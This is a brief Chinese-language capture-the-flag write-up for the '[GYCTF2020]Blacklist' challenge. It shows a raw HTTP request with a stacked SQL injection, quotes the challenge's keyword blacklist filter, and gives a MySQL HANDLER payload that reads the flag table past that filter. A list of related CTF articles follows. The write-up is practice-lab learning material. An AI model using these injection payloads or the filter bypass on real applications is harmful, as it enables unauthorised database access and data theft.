[GYCTF2020]Blacklist

堆叠注入，前面与“[强网杯 2019]随便注”一致，查询到 flag 在FlagHere 表中。

GET /?inject=1'%3bshow+tables%3b%23 HTTP/1.1
Host: 0ebc2b91-75a9-4336-89cc-32c2c89ee4d1.node4.buuoj.cn:81
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://0ebc2b91-75a9-4336-89cc-32c2c89ee4d1.node4.buuoj.cn:81/?inject=0%3Bshow+databases%3B
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

题目过滤：return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);。因此使用HANDLER Statement 的方式读取 flag。

0';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;#

本栏目推荐文章
• mrctf2020_easyoverflow
• CVE-2020-11800
• 【LeetCode 1635. Hopper 公司查询 I】with recursive生成2020年每月的最后一天
• 2020-2021 ACM-ICPC, Asia Seoul Regional Contest
• [ACTF2020 新生赛]Exec 1
• wustctf2020_getshell_2
• P6646 [CCO2020] Shopping Plans
• bjdctf_2020_router
• 题解 P7165 [COCI2020-2021#1] Papričice
• mrctf2020_shellcode

Blacklist GYCTF 2020blacklist gyctf 2020 flaskapp gyctf 2020 web ezsqli gyctf 2020 web flaskapp buuctf gyctf 2020 blacklist gyctf 2020 2020.11 2020.03 2020.2